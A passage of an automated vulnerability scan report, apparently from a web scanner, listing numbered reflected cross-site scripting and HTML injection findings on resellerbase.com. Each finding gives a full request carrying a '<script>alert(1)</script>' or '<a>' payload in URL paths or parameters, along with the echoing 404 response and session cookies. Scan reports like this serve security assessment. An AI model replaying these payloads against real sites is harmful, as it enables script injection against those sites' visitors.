<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...b16b3<a>2213dd70319&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.899. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 730d3<script>alert(1)</script>295005a3b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&730d3<script>alert(1)</script>295005a3b49=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&730d3<script>alert(1)</script>295005a3b49=1 was not found on this server.</p>
...[SNIP]...

2.900. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6627a<a>dcc21b58da was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26627a<a>dcc21b58da HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26627a<a>dcc21b58da was not found on this server.</p>
...[SNIP]...

2.901. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1fa0<script>alert(1)</script>016d92af695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild1fa0<script>alert(1)</script>016d92af695/10/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild1fa0<script>alert(1)</script>016d92af695/10/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.902. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8783<script>alert(1)</script>7c286f6044c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10c8783<script>alert(1)</script>7c286f6044c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10c8783<script>alert(1)</script>7c286f6044c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.903. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 21ea3<script>alert(1)</script>3f1765e31d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes21ea3<script>alert(1)</script>3f1765e31d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes21ea3<script>alert(1)</script>3f1765e31d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.904. http://www.resellerbase.com/detail/10/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a42be<script>alert(1)</script>8ad7971f155 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/search.phpa42be<script>alert(1)</script>8ad7971f155?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.phpa42be<script>alert(1)</script>8ad7971f155?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.905. http://www.resellerbase.com/detail/10/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4517a<a>0c4b2e5aa7a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search4517a<a>0c4b2e5aa7a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...&Submit3=Search4517a<a>0c4b2e5aa7a&opt=2 was not found on this server.</p>
...[SNIP]...

2.906. http://www.resellerbase.com/detail/10/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 19ccf<a>a5d742e8e9d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/search.php?keyword=search...19ccf<a>a5d742e8e9d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...19ccf<a>a5d742e8e9d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.907. http://www.resellerbase.com/detail/10/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 714fe<script>alert(1)</script>5e24f3fc98f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2&714fe<script>alert(1)</script>5e24f3fc98f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2&714fe<script>alert(1)</script>5e24f3fc98f=1 was not found on this server.</p>
...[SNIP]...

2.908. http://www.resellerbase.com/detail/10/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5bc9d<a>c92b91ad994 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=25bc9d<a>c92b91ad994 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=25bc9d<a>c92b91ad994 was not found on this server.</p>
...[SNIP]...

2.909. http://www.resellerbase.com/detail/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca492<script>alert(1)</script>8f9fad94708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailca492<script>alert(1)</script>8f9fad94708/11/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailca492<script>alert(1)</script>8f9fad94708/11/ was not found on this server.</p>
...[SNIP]...

2.910. http://www.resellerbase.com/detail/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91bee<script>alert(1)</script>127e165ca9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1191bee<script>alert(1)</script>127e165ca9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1191bee<script>alert(1)</script>127e165ca9/ was not found on this server.</p>
...[SNIP]...

2.911. http://www.resellerbase.com/detail/11/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd1d1<script>alert(1)</script>2c1fe0772ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/?cd1d1<script>alert(1)</script>2c1fe0772ad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.912. http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/how-to-win-with-online-reseller-products.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5094<script>alert(1)</script>c117f13e57f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb5094<script>alert(1)</script>c117f13e57f/11/how-to-win-with-online-reseller-products.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb5094<script>alert(1)</script>c117f13e57f/11/how-to-win-with-online-reseller-products.html was not found on this server.</p>
...[SNIP]...

2.913. http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/how-to-win-with-online-reseller-products.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f455<a>2c59c8e353e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/114f455<a>2c59c8e353e/how-to-win-with-online-reseller-products.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/114f455<a>2c59c8e353e/how-to-win-with-online-reseller-products.html was not found on this server.</p>
...[SNIP]...

2.914. http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/how-to-win-with-online-reseller-products.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4dd99<script>alert(1)</script>53dcb7a5d2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/4dd99<script>alert(1)</script>53dcb7a5d2c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/4dd99<script>alert(1)</script>53dcb7a5d2c was not found on this server.</p>
...[SNIP]...

2.915. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b833d<script>alert(1)</script>df753b03561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb833d<script>alert(1)</script>df753b03561/11/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb833d<script>alert(1)</script>df753b03561/11/rating.php was not found on this server.</p>
...[SNIP]...

2.916. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dda1a<script>alert(1)</script>17851873386b454c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaildda1a<script>alert(1)</script>17851873386b454c9/11/rating.php?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildda1a<script>alert(1)</script>17851873386b454c9/11/rating.php?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.917. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5e0f<script>alert(1)</script>0071cdda0edf64409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/11c5e0f<script>alert(1)</script>0071cdda0edf64409/rating.php?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11c5e0f<script>alert(1)</script>0071cdda0edf64409/rating.php?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.918. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
